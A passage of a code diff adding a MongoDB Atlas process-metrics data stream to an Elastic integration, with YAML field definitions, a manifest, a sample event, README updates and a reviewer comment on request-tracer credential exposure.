+ type: double + metric_type: gauge + unit: s + - name: rate.gb_per_hour + description: The rate of change in the size of the oplog in gigabytes per hour. + type: double + metric_type: gauge + - name: repl_lag.s + description: The amount of time, typically in seconds, it takes for changes recorded in the oplog on the primary node to be replicated and applied to the secondary node. + type: double + metric_type: gauge + unit: s + - name: slave.lag.master.time.s + description: The difference in time, typically in seconds, between the oplog time on the secondary (slave) node and the time of the latest operation in the oplog on the primary (master) node. + type: double + metric_type: gauge + unit: s + - name: query + type: group + fields: + - name: executor + type: group + fields: + - name: scanned + description: Average rate per second to scan index items during queries and query-plan evaluations. + type: double + metric_type: gauge + - name: scanned_objects + description: Average rate of documents scanned per second during queries and query-plan evaluations. + type: double + metric_type: gauge + - name: targeting + type: group + fields: + - name: scanned_objects_per_returned + description: Ratio of the number of documents scanned to the number of documents returned. + type: double + metric_type: gauge + - name: scanned_per_returned + description: Ratio of the number of index items scanned to the number of documents returned. + type: double + metric_type: gauge + - name: restart.in_last_hour + description: Number of times the host restarted within the previous hour. + type: double + metric_type: gauge + - name: swap + type: group + fields: + - name: usage + type: group + fields: + - name: free.max.kb + description: Max amount of swap space free. + type: double + metric_type: counter + - name: total + type: group + fields: + - name: free + description: Total amount of swap space free. 
+ type: double + metric_type: gauge + - name: used + description: Total amount of swap space in use. + type: double + metric_type: gauge + - name: used.max.kb + description: Max amount of swap space in use. + type: double + metric_type: counter + - name: system + type: group + fields: + - name: cpu + type: group + fields: + - name: guest + type: group + fields: + - name: max.pct + description: Max amount of CPU time spent running a virtual CPU for guest operating systems. + type: double + metric_type: counter + unit: percent + - name: pct + description: Tracks CPU time consumed by guest operating systems, like virtual machines, on the host system. + type: double + metric_type: gauge + unit: percent + - name: iowait + type: group + fields: + - name: max.pct + description: Max amount of CPU time spent waiting for I/O operations to complete. + type: double + metric_type: counter + unit: percent + - name: pct + description: The CPU time spent waiting for I/O operations to complete. + type: double + metric_type: gauge + unit: percent + - name: irq + type: group + fields: + - name: max.pct + description: Max amount of CPU time spent servicing hardware interrupts. + type: double + metric_type: counter + unit: percent + - name: pct + description: The portion of CPU time spent servicing hardware interrupts. + type: double + metric_type: gauge + unit: percent + - name: kernel + type: group + fields: + - name: max.pct + description: Max amount of CPU time spent in kernel space, executing system calls and handling hardware interrupts. + type: double + metric_type: counter + unit: percent + - name: pct + description: The portion of CPU time spent executing kernel space processes and handling system calls. + type: double + metric_type: gauge + unit: percent + - name: nice.pct + description: The portion of CPU time allocated to processes with a 'nice' priority level. 
+ type: double + metric_type: gauge + unit: percent + - name: softirq + type: group + fields: + - name: max.pct + description: Max amount of CPU time spent servicing soft interrupts, which are interrupts triggered by software. + type: double + metric_type: counter + unit: percent + - name: pct + description: The CPU time spent handling software-generated interrupts. + type: double + metric_type: gauge + unit: percent + - name: steal + type: group + fields: + - name: max.pct + description: Max amount of CPU time 'stolen' by the hypervisor for other virtual machines running on the same physical host. + type: double + metric_type: counter + unit: percent + - name: pct + description: The amount of CPU time 'stolen' by the hypervisor for other virtual machines running on the same physical host. + type: double + metric_type: gauge + unit: percent + - name: user + type: group + fields: + - name: max.pct + description: Max amount of CPU time spent in user space, executing user-level processes and applications. + type: double + metric_type: counter + unit: percent + - name: pct + description: The portion of CPU time spent executing user space processes and running applications. + type: double + metric_type: gauge + unit: percent + - name: memory + type: group + fields: + - name: available + type: group + fields: + - name: kb + description: Physical memory available in kilobytes. + type: double + metric_type: gauge + - name: max.kb + description: Max Physical memory available in kilobytes. + type: double + metric_type: counter + - name: free + type: group + fields: + - name: kb + description: Physical memory free in kilobytes. + type: double + metric_type: gauge + - name: max.kb + description: Max Physical memory free in kilobytes. + type: double + metric_type: counter + - name: used + type: group + fields: + - name: kb + description: Physical memory used in kilobytes. + type: double + metric_type: gauge + - name: max.kb + description: Max Physical memory used in kilobytes. 
+ type: double + metric_type: counter + - name: network + type: group + fields: + - name: in + description: Incoming network throughput in bytes per second. + type: double + metric_type: gauge + - name: max.in + description: Max Incoming network throughput in bytes per second. + type: double + metric_type: counter + - name: out + description: Outgoing network throughput in bytes per second. + type: double + metric_type: gauge + - name: max.out + description: Max Outgoing network throughput in bytes per second. + type: double + metric_type: counter + - name: normalized + type: group + fields: + - name: cpu + type: group + fields: + - name: guest + type: group + fields: + - name: max.pct + description: Max Guest CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: Guest CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: gauge + unit: percent + - name: iowait + type: group + fields: + - name: max.pct + description: Max CPU usage of processes spent waiting for IO operations to complete, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: CPU usage of processes spent waiting for IO operations to complete, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: gauge + unit: percent + - name: irq + type: group + fields: + - name: max.pct + description: Max CPU usage of hardware interrupts, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. 
+ type: double + metric_type: counter + unit: percent + - name: pct + description: NORMALIZED irq CPU utilization across various processes for a server + type: double + metric_type: gauge + unit: percent + - name: kernel + type: group + fields: + - name: max.pct + description: Max kernel CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: Kernel CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: gauge + unit: percent + - name: nice + type: group + fields: + - name: max.pct + description: Max CPU usage of processes with a positive nice value, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: NORMALIZED nice CPU utilization across various processes for a server + type: double + metric_type: gauge + unit: percent + - name: softirq + type: group + fields: + - name: max.pct + description: Max CPU usage of software interrupts, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. + type: double + metric_type: counter + unit: percent + - name: pct + description: NORMALIZED softirq CPU utilization across various processes for a server + type: double + metric_type: gauge + unit: percent + - name: steal + type: group + fields: + - name: max.pct + description: Max The percentage of time the CPU had something runnable, but the hypervisor chose to run something else, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores. 
+ type: double
+ metric_type: counter
+ unit: percent
+ - name: pct
+ description: The percentage of time the CPU had something runnable, but the hypervisor chose to run something else, scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores.
+ type: double
+ metric_type: gauge
+ unit: percent
+ - name: user
+ type: group
+ fields:
+ - name: max.pct
+ description: Max user CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores.
+ type: double
+ metric_type: counter
+ unit: percent
+ - name: pct
+ description: NORMALIZED CPU user space utilization across various processes for a server
+ type: double
+ metric_type: gauge
+ unit: percent
+ - name: user
+ type: group
+ fields:
+ - name: max.pct
+ description: Max user CPU usage of processes on the host scaled to a range of 0 to 100%, is obtained by dividing the usage value by the total number of CPU cores.
+ type: double
+ metric_type: counter
+ unit: percent
+ - name: pct
+ description: The portion of CPU time spent executing user space processes and running applications.
+ type: double
+ metric_type: gauge
+ unit: percent
+ - name: ticket
+ type: group
+ fields:
+ - name: available
+ type: group
+ fields:
+ - name: read.count
+ description: The number of read tickets available to the WiredTiger storage engine.
+ type: long
+ metric_type: gauge
+ - name: write.count
+ description: The number of write tickets available to the WiredTiger storage engine.
+ type: long
+ metric_type: gauge
+ - name: process_id
+ description: Combination of hostname and Internet Assigned Numbers Authority (IANA) port that serves the MongoDB process.
+ type: keyword
diff --git a/packages/mongodb_atlas/data_stream/process/manifest.yml b/packages/mongodb_atlas/data_stream/process/manifest.yml
new file mode 100644
index 00000000000..65e84f48af9
--- /dev/null
+++ b/packages/mongodb_atlas/data_stream/process/manifest.yml 
@@ -0,0 +1,54 @@
+title: Collect Process metrics from MongoDB Atlas
+type: logs
+streams:
+ - input: cel
+ title: MongoDB Atlas Process metrics
+ description: Collect Process metrics from MongoDB Atlas.
+ template_path: input.yml.hbs
+ vars:
+ - name: period
+ type: text
+ title: Period
+ description: Period of fetching metrics. Value of Granularity and Period will be same (check readme for more details). Supported units for this parameter are h/m.
+ default: 10m
+ multi: false
+ required: true
+ show_user: false
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ description: Duration before declaring that the HTTP client connection has timed out. Valid time units are m/s. If the data collection period is extensive, ensure that this parameter's value is appropriately long.
+ multi: false
+ required: true
+ show_user: true
+ default: 1m
+ - name: groupId
+ type: text
+ title: GroupId
+ description: Identifier string that identifies your project. Groups and projects are synonymous terms. Group id is identical to project id. Ex. 32b6e34b3d91647abb20e7b8
+ multi: false
+ required: true
+ show_user: true
+ - name: enable_request_tracer
+ type: bool
+ title: Enable request tracing
+ multi: false
+ required: false
+ show_user: false
+ description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html#_resource_tracer_filename) for details.
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - mongodb_atlas-process
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/fleet/current/elastic-agent-processor-configuration.html) for details.
diff --git a/packages/mongodb_atlas/data_stream/process/sample_event.json b/packages/mongodb_atlas/data_stream/process/sample_event.json
new file mode 100644
index 00000000000..563e7ab724c
--- /dev/null
+++ b/packages/mongodb_atlas/data_stream/process/sample_event.json
@@ -0,0 +1,74 @@
+{
+ "@timestamp": "2024-04-11T12:42:53.267Z",
+ "agent": {
+ "ephemeral_id": "c8ebb866-6d72-471b-9083-6d386219bf61",
+ "id": "926ca6d4-5487-4a8b-b88b-34f188fe8cfb",
+ "name": "docker-fleet-agent",
+ "type": "filebeat",
+ "version": "8.13.0"
+ },
+ "data_stream": {
+ "dataset": "mongodb_atlas.process",
+ "namespace": "ep",
+ "type": "logs"
+ },
+ "ecs": {
+ "version": "8.11.0"
+ },
+ "elastic_agent": {
+ "id": "926ca6d4-5487-4a8b-b88b-34f188fe8cfb",
+ "snapshot": false,
+ "version": "8.13.0"
+ },
+ "event": {
+ "agent_id_status": "verified",
+ "category": [
+ "process"
+ ],
+ "dataset": "mongodb_atlas.process",
+ "ingested": "2024-04-11T12:43:05Z",
+ "kind": "event",
+ "module": "mongodb_atlas",
+ "type": [
+ "info"
+ ]
+ },
+ "host": {
+ "architecture": "x86_64",
+ "containerized": true,
+ "hostname": "docker-fleet-agent",
+ "id": "8259e024976a406e8a54cdbffeb84fec",
+ "ip": [
+ "192.168.253.4"
+ ],
+ "mac": [
+ "02-42-C0-A8-FD-04"
+ ],
+ "name": "docker-fleet-agent",
+ "os": {
+ "codename": "focal",
+ "family": "debian",
+ "kernel": "3.10.0-1160.92.1.el7.x86_64",
+ "name": "Ubuntu",
+ "platform": "ubuntu",
+ "type": "linux",
+ "version": "20.04.6 LTS (Focal Fossa)"
+ }
+ },
+ "input": {
+ "type": "cel"
+ },
+ "mongodb_atlas": {
+ "group_id": "mongodb-group1",
+ "host_id": "hostname1",
+ "process": {
+ "assert": {
+ "regular": 0
+ }
+ },
+ "process_id": "hostname1"
+ },
+ "tags": [
+ "mongodb_atlas-process"
+ ]
+}
\ No newline at end of file
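Review bot: The `enable_request_tracer` description in this new manifest warns only generically that tracing "compromises security"; since the tracer writes full requests and responses to the agent's local file system, those files will presumably carry the Atlas API credentials sent with each request and the returned project data, so the warning should say what is exposed and what to do with the files. Suggested wording: `Enabling this request tracing compromises security: the trace files may contain the API credentials sent with each request and the full response bodies, so restrict access to them and delete them once debugging is complete.` Separately, `period` is hidden (`show_user: false`) while the `http_client_timeout` description asks the user to size the timeout against the collection period; either expose `period` or state its `10m` default in the timeout description so the user can make that judgement.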
diff --git a/packages/mongodb_atlas/docs/README.md b/packages/mongodb_atlas/docs/README.md
index 883bbce34a2..cc17df46cd8 100644
--- a/packages/mongodb_atlas/docs/README.md
+++ b/packages/mongodb_atlas/docs/README.md
@@ -6,19 +6,23 @@ Use the MongoDB Atlas integration to:
-- Collect MongoDB Audit logs for comprehensive monitoring and analysis.
+- Collect MongoDB Audit logs and Process metrics for comprehensive monitoring and analysis.
 - Create informative visualizations to track usage trends, measure key metrics, and derive actionable business insights.
 - Set up alerts to minimize Mean Time to Detect (MTTD) and Mean Time to Resolve (MTTR) by quickly referencing relevant logs during troubleshooting.
 ## Data streams
-The MongoDB Atlas integration collects logs.
+The MongoDB Atlas integration collects logs and metrics.
 Logs help you keep a record of events that happen on your machine. The `Log` data stream collected by MongoDB Atlas integration is `mongod_audit`.
+Metrics give you insight into the statistics of the MongoDB Atlas. The `Metric` data stream collected by the MongoDB Atlas integration is `process` so that the user can monitor and troubleshoot the performance of the MongoDB Atlas instance.
+
 Data streams:
 - `mongod_audit`: The auditing facility allows administrators and users to track system activity for deployments with multiple users and applications. Mongod Audit logs capture events related to database operations such as insertions, updates, deletions, user authentication, etc., occurring within the mongod instances.
+- `process` : This data stream collects host metrics per process for all the hosts of the specified group. Metrics like measurements for the host, such as CPU usage, number of I/O operations and memory are available on this data stream.
+
 Note:
 - Users can monitor and see the log inside the ingested documents for MongoDB Atlas in the `logs-*` index pattern from `Discover`.
@@ -28,18 +32,25 @@ You can store and search your data using Elasticsearch and visualize and manage
 ## Setup
-### To collect data from MongoDB Atlas, the following parameters from your MongoDB Atlas instance are required:
+### To collect data from MongoDB Atlas, the following parameters from your MongoDB Atlas instance are required
 1. Public Key
 2. Private Key
 3. GroupId
-### Steps to obtain Public Key, Private Key and GroupId:
+### Steps to obtain Public Key, Private Key and GroupId
 1. Generate programmatic API Keys with project owner permissions using the instructions in the Atlas [documentation](https://www.mongodb.com/docs/atlas/configure-api-access/#create-an-api-key-for-a-project). Then, copy the public key and private key. These serve the same function as a username and API Key respectively.
 2. Enable Database Auditing for the Atlas project you want to monitor logs. You can follow the instructions provided in this Atlas [document](https://www.mongodb.com/docs/atlas/database-auditing/#procedure).
 3. You can find your Project ID (Group ID) in the Atlas UI. To do this, navigate to your project, click on Settings, and copy the Project ID (Group ID). You can also programmatically find it using the Atlas Admin API or Atlas CLI as described in this Atlas [document](https://www.mongodb.com/docs/atlas/app-services/apps/metadata/#find-a-project-id).
+### Important terms of MongoDB Atlas API
+
+1. Granularity: Duration that specifies the interval at which Atlas reports the metrics.
+2. Period: Duration over which Atlas reports the metrics.
+
+Note: Both of above attributes can be set by using `period` in configuration parameters.
+
 ### Steps to enable Integration in Elastic
 1. In Kibana go to Management > Integrations
@@ -205,3 +216,237 @@ An example event for `mongod_audit` looks as following: | mongodb_atlas.mongod_audit.uuid.binary | Document that contains a universally unique identifier (UUID) for the audit message. | keyword | | mongodb_atlas.mongod_audit.uuid.type | The $type field specifies the BSON subtype for the $binary field. | keyword | | tags | List of keywords used to tag each event. | keyword | + + +## Metrics reference + +### Process +This data stream collects host metrics per process for all the hosts of the specified group. Metrics like measurements for the host, such as CPU usage, number of I/O operations and memory are available on this data stream. + +An example event for `process` looks as following: + +```json +{ + "@timestamp": "2024-04-11T12:42:53.267Z", + "agent": { + "ephemeral_id": "c8ebb866-6d72-471b-9083-6d386219bf61", + "id": "926ca6d4-5487-4a8b-b88b-34f188fe8cfb", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.13.0" + }, + "data_stream": { + "dataset": "mongodb_atlas.process", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "926ca6d4-5487-4a8b-b88b-34f188fe8cfb", + "snapshot": false, + "version": "8.13.0" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "process" + ], + "dataset": "mongodb_atlas.process", + "ingested": "2024-04-11T12:43:05Z", + "kind": "event", + "module": "mongodb_atlas", + "type": [ + "info" + ] + }, + "host": { + "architecture": "x86_64", + "containerized": true, + "hostname": "docker-fleet-agent", + "id": "8259e024976a406e8a54cdbffeb84fec", + "ip": [ + "192.168.253.4" + ], + "mac": [ + "02-42-C0-A8-FD-04" + ], + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "3.10.0-1160.92.1.el7.x86_64", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.6 LTS (Focal Fossa)" + } + }, + "input": { + "type": "cel" + }, + "mongodb_atlas": { + "group_id": 
"mongodb-group1", + "host_id": "hostname1", + "process": { + "assert": { + "regular": 0 + } + }, + "process_id": "hostname1" + }, + "tags": [ + "mongodb_atlas-process" + ] +} +``` + +**Exported fields** + +| Field | Description | Type | Unit | Metric Type | +|---|---|---|---|---| +| @timestamp | Event timestamp. | date | | | +| data_stream.dataset | Data stream dataset. | constant_keyword | | | +| data_stream.namespace | Data stream namespace. | constant_keyword | | | +| data_stream.type | Data stream type. | constant_keyword | | | +| input.type | Type of Filebeat input. | keyword | | | +| mongodb_atlas.group_id | Identifier for the project of the event. | keyword | | | +| mongodb_atlas.host_id | Unique identifier of the host for the MongoDB process. | keyword | | | +| mongodb_atlas.process.assert.msg | The average rate of message asserts per second over the selected sample period. | double | | gauge | +| mongodb_atlas.process.assert.regular | The average rate of regular asserts raised per second over the selected sample period. | double | | gauge | +| mongodb_atlas.process.assert.user | The average rate of user asserts per second over the selected sample period. | double | | gauge | +| mongodb_atlas.process.assert.warning | The average rate of warnings per second over the selected sample period. | double | | gauge | +| mongodb_atlas.process.background_flush.avg | Amount of data flushed in the background. | double | | gauge | +| mongodb_atlas.process.cache.dirty.bytes | Write - Amount of bytes in the WiredTiger storage engine cache. | double | byte | gauge | +| mongodb_atlas.process.cache.read.bytes | Read - Amount of bytes in the WiredTiger storage engine cache. | double | byte | gauge | +| mongodb_atlas.process.cache.used.total.bytes | The total bytes cached in memory for serving reads and writes. | double | byte | gauge | +| mongodb_atlas.process.cache.write.bytes | The maximum disk read latency value over the period specified by the metric granularity. 
| double | byte | gauge | +| mongodb_atlas.process.connections | Displays the total number of active connections to the database deployment. Monitor connections to determine whether the current connection limits are sufficient. | double | | gauge | +| mongodb_atlas.process.cpu.children.kernel.max.pct | The maximum amount of CPU time spent by child processes in kernel space. | double | percent | counter | +| mongodb_atlas.process.cpu.children.kernel.pct | CPU children kernel space for mongodb processes. | double | percent | gauge | +| mongodb_atlas.process.cpu.children.user.max.pct | The maximum amount of CPU time spent by child processes in user space. | double | percent | counter | +| mongodb_atlas.process.cpu.children.user.pct | CPU children user space for mongodb. | double | percent | gauge | +| mongodb_atlas.process.cpu.kernel.max.pct | The maximum amount of CPU time spent by the MongoDB process itself in kernel space, handling system calls and hardware interrupts. | double | percent | counter | +| mongodb_atlas.process.cpu.kernel.pct | CPU kernel space for mongodb processes. | double | percent | gauge | +| mongodb_atlas.process.cpu.normalized.children.kernel.max.pct | Max children kernel CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter | +| mongodb_atlas.process.cpu.normalized.children.kernel.pct | NORMALIZED CPU children kernel space for mongodb processes. | double | percent | gauge | +| mongodb_atlas.process.cpu.normalized.children.user.max.pct | Max children user CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter | +| mongodb_atlas.process.cpu.normalized.children.user.pct | NORMALIZED CPU children user space for mongodb. 
| double | percent | gauge |
+| mongodb_atlas.process.cpu.normalized.kernel.max.pct | Max kernel CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter |
+| mongodb_atlas.process.cpu.normalized.kernel.pct | NORMALIZED CPU kernel space for mongodb processes. | double | percent | gauge |
+| mongodb_atlas.process.cpu.normalized.user.max.pct | Max user CPU usage scaled to a range of 0% to 100%, is obtained by dividing the usage value by the total number of CPU cores. | double | percent | counter |
+| mongodb_atlas.process.cpu.normalized.user.pct | NORMALIZED CPU user space for mongodb processes. | double | percent | gauge |
+| mongodb_atlas.process.cpu.user.max.pct | The maximum amount of CPU time spent by the MongoDB process itself in user space, executing application code and processing data. | double | percent | counter |
+| mongodb_atlas.process.cpu.user.pct | CPU user space for mongodb processes. | double | percent | gauge |
+| mongodb_atlas.process.cursor.open.total | The number of cursors that the server maintains for clients. | long | | gauge |
+| mongodb_atlas.process.cursor.timed_out.total | The average rate of cursors that have timed out per second over the selected sample period. | double | | gauge |
+| mongodb_atlas.process.database.size.total.bytes | The amount of storage space in bytes that your stored data uses. | long | byte | gauge |
+| mongodb_atlas.process.database.storage.total.bytes | Sum total of the compressed on-disk storage space allocated for document storage across all databases. | long | byte | gauge |
+| mongodb_atlas.process.document.deleted | Displays the documents deleted per second. | double | | gauge |
+| mongodb_atlas.process.document.inserted | Displays the documents inserted per second. | double | | gauge |
+| mongodb_atlas.process.document.returned | Displays the documents returned per second. | double | | gauge |
+| mongodb_atlas.process.document.updated | Displays the documents updated per second. | double | | gauge |
+| mongodb_atlas.process.fts.cpu.kernel.pct | The amount of CPU time spent by the Full-Text search process in kernel space. | double | percent | gauge |
+| mongodb_atlas.process.fts.cpu.normalized.kernel.pct | Percentage of time that the CPU spent servicing the operating system calls for the search process. | double | percent | gauge |
+| mongodb_atlas.process.fts.cpu.normalized.user.pct | Percentage of time that the CPU spent servicing user calls for the search process. | double | percent | gauge |
+| mongodb_atlas.process.fts.cpu.user.pct | The amount of CPU time spent by the Full-Text search process in user space. | double | percent | gauge |
+| mongodb_atlas.process.fts.disk.utilization.total.bytes | Total bytes of disk space that search processes use. | long | byte | gauge |
+| mongodb_atlas.process.fts.memory.mapped.total.bytes | Total bytes of mapped memory that search processes occupy. | long | byte | gauge |
+| mongodb_atlas.process.fts.memory.resident.total.bytes | Total bytes of resident memory that search processes occupy. | long | byte | gauge |
+| mongodb_atlas.process.fts.memory.virtual.total.bytes | Total bytes of virtual memory that search processes occupy. | long | byte | gauge |
+| mongodb_atlas.process.global.access.not_in_memory | The number of accesses to data that are not currently stored in memory, requiring disk access. | long | | gauge |
+| mongodb_atlas.process.global.lock.current_queue.reader.count | The number of operations that are currently queued and waiting for the read lock. | long | | gauge |
+| mongodb_atlas.process.global.lock.current_queue.total | The total number of operations queued waiting for the lock (readers + writers) | long | | gauge |
+| mongodb_atlas.process.global.lock.current_queue.writer.count | The number of operations that are currently queued and waiting for the write lock. | long | | gauge |
+| mongodb_atlas.process.global.page_fault.exception_thrown | The number of exceptions thrown due to page faults. | long | | gauge |
+| mongodb_atlas.process.host.page_faults | Measurements on page faults related to the host. | double | | gauge |
+| mongodb_atlas.process.index.btree.access.count | Number of index btree ACCESSES. | long | | gauge |
+| mongodb_atlas.process.index.btree.hits.count | Number of index btree HITS. | long | | gauge |
+| mongodb_atlas.process.index.btree.miss.count | Number of index btree MISSES. | long | | gauge |
+| mongodb_atlas.process.index.btree.miss_ratio.count | Index btree miss ratio. | double | | gauge |
+| mongodb_atlas.process.journaling.commits.write_lock | Number of journaling COMMIT operations. | long | | gauge |
+| mongodb_atlas.process.journaling.mb | Average amount of data in megabytes Cloud Manager writes to the recovery log per second meets your specified threshold. | double | | gauge |
+| mongodb_atlas.process.journaling.write.data_files.mb | The maximum size in megabytes (MB) of data files written by the journaling process. | double | | gauge |
+| mongodb_atlas.process.memory.computed.mb | Amount of COMPUTED process memory in megabytes. | double | | gauge |
+| mongodb_atlas.process.memory.mapped.mb | Amount of MAPPED process memory in megabytes. | double | | gauge |
+| mongodb_atlas.process.memory.resident.mb | Amount of RESIDENT process memory in megabytes. | double | | gauge |
+| mongodb_atlas.process.memory.virtual.mb | Amount of VIRTUAL process memory in megabytes. | double | | gauge |
+| mongodb_atlas.process.network.in | Process incoming network throughput in bytes per second. | double | | gauge |
+| mongodb_atlas.process.network.out | Process outgoing network throughput in bytes per second. | double | | gauge |
+| mongodb_atlas.process.network.request.total | The total number of distinct requests that the process has received. | double | | counter |
+| mongodb_atlas.process.opcounter.cmd | Database operations rate on a process since the process last started. | double | | gauge |
+| mongodb_atlas.process.opcounter.delete | Database DELETE operations rate on a process since the process last started. | double | | gauge |
+| mongodb_atlas.process.opcounter.getmore | Database GETMORE operations rate on a process since the process last started. | double | | gauge |
+| mongodb_atlas.process.opcounter.insert | Database INSERT operations rate on a process since the process last started. | double | | gauge |
+| mongodb_atlas.process.opcounter.query | Database QUERY operations rate on a process since the process last started. | double | | gauge |
+| mongodb_atlas.process.opcounter.repl.cmd | Database operations rate on secondaries. | double | | gauge |
+| mongodb_atlas.process.opcounter.repl.delete | Database DELETE operations rate on secondaries. | double | | gauge |
+| mongodb_atlas.process.opcounter.repl.insert | Database INSERT operations rate on secondaries. | double | | gauge |
+| mongodb_atlas.process.opcounter.repl.update | Database UPDATE operations rate on secondaries. | double | | gauge |
+| mongodb_atlas.process.opcounter.update | Database UPDATE operations rate on a process since the process last started. | double | | gauge |
+| mongodb_atlas.process.operation.execution.time.cmd.avg.ms | Average execution time in milliseconds per command operation over the selected sample period. | double | ms | gauge |
+| mongodb_atlas.process.operation.execution.time.read.avg.ms | Average execution time in milliseconds per read operation over the selected sample period. | double | ms | gauge |
+| mongodb_atlas.process.operation.execution.time.write.avg.ms | Average execution time in milliseconds per write operation over the selected sample period. | double | ms | gauge |
+| mongodb_atlas.process.operation.scan_and_order | The total number of queries that return sorted data that cannot perform the sort operation using an index. | double | | gauge |
+| mongodb_atlas.process.oplog.master.lag.time_diff.s | Lag or delay in replication between the primary node (oplog master) and its secondary nodes. | double | s | gauge |
+| mongodb_atlas.process.oplog.master.time.s | The replication oplog window. The approximate time available in the primary's replication oplog. If a secondary is behind real-time by more than this amount, it cannot catch up and will require a full resync. | double | s | gauge |
+| mongodb_atlas.process.oplog.rate.gb_per_hour | The rate of change in the size of the oplog in gigabytes per hour. | double | | gauge |
+| mongodb_atlas.process.oplog.repl_lag.s | The amount of time, typically in seconds, it takes for changes recorded in the oplog on the primary node to be replicated and applied to the secondary node. | double | s | gauge |
+| mongodb_atlas.process.oplog.slave.lag.master.time.s | The difference in time, typically in seconds, between the oplog time on the secondary (slave) node and the time of the latest operation in the oplog on the primary (master) node. | double | s | gauge |
+| mongodb_atlas.process.query.executor.scanned | Average rate per second to scan index items during queries and query-plan evaluations. | double | | gauge |
+| mongodb_atlas.process.query.executor.scanned_objects | Average rate of documents scanned per second during queries and query-plan evaluations. | double | | gauge |
+| mongodb_atlas.process.query.targeting.scanned_objects_per_returned | Ratio of the number of documents scanned to the number of documents returned. | double | | gauge |
+| mongodb_atlas.process.query.targeting.scanned_per_returned | Ratio of the number of index items scanned to the number of documents returned. | double | | gauge |
+| mongodb_atlas.process.restart.in_last_hour | Number of times the host restarted within the previous hour. | double | | gauge |
+| mongodb_atlas.process.swap.usage.free.max.kb | Max amount of swap space free. | double | | counter |
+| mongodb_atlas.process.swap.usage.total.free | Total amount of swap space free. | double | | gauge |
+| mongodb_atlas.process.swap.usage.total.used | Total amount of swap space in use. | double | | gauge |
+| mongodb_atlas.process.swap.usage.used.max.kb | Max amount of swap space in use. | double | | counter |
+| mongodb_atlas.process.system.cpu.guest.max.pct | Max amount of CPU time spent running a virtual CPU for guest operating systems. | double | percent | counter |
+| mongodb_atlas.process.system.cpu.guest.pct | Tracks CPU time consumed by guest operating systems, like virtual machines, on the host system. | double | percent | gauge |
+| mongodb_atlas.process.system.cpu.iowait.max.pct | Max amount of CPU time spent waiting for I/O operations to complete. | double | percent | counter |
+| mongodb_atlas.process.system.cpu.iowait.pct | The CPU time spent waiting for I/O operations to complete. | double | percent | gauge |
+| mongodb_atlas.process.system.cpu.irq.max.pct | Max amount of CPU time spent servicing hardware interrupts. | double | percent | counter |
+| mongodb_atlas.process.system.cpu.irq.pct | The portion of CPU time spent servicing hardware interrupts. | double | percent | gauge |
+| mongodb_atlas.process.system.cpu.kernel.max.pct | Max amount of CPU time spent in kernel space, executing system calls and handling hardware interrupts. | double | percent | counter |
+| mongodb_atlas.process.system.cpu.kernel.pct | The portion of CPU time spent executing kernel space processes and handling system calls. | double | percent | gauge |
+| mongodb_atlas.process.system.cpu.nice.pct | The portion of CPU time allocated to processes with a 'nice' priority level. | double | percent | gauge |
+| mongodb_atlas.process.system.cpu.softirq.max.pct | Max amount of CPU time spent servicing soft interrupts, which are interrupts triggered by software. | double | percent | counter |
+| mongodb_atlas.process.system.cpu.softirq.pct | The CPU time spent handling software-generated interrupts. | double | percent | gauge |
+| mongodb_atlas.process.system.cpu.steal.max.pct | Max amount of CPU time 'stolen' by the hypervisor for other virtual machines running on the same physical host. | double | percent | counter |
+| mongodb_atlas.process.system.cpu.steal.pct | The amount of CPU time 'stolen' by the hypervisor for other virtual machines running on the same physical host. | double | percent | gauge |
+| mongodb_atlas.process.system.cpu.user.max.pct | Max amount of CPU time spent in user space, executing user-level processes and applications. | double | percent | counter |
+| mongodb_atlas.process.system.cpu.user.pct | The portion of CPU time spent executing user space processes and running applications. | double | percent | gauge |
+| mongodb_atlas.process.system.memory.available.kb | Physical memory available in kilobytes. | double | | gauge |
+| mongodb_atlas.process.system.memory.available.max.kb | Max Physical memory available in kilobytes. | double | | counter |
+| mongodb_atlas.process.system.memory.free.kb | Physical memory free in kilobytes. | double | | gauge |
+| mongodb_atlas.process.system.memory.free.max.kb | Max Physical memory free in kilobytes. | double | | counter |
+| mongodb_atlas.process.system.memory.used.kb | Physical memory used in kilobytes. | double | | gauge |
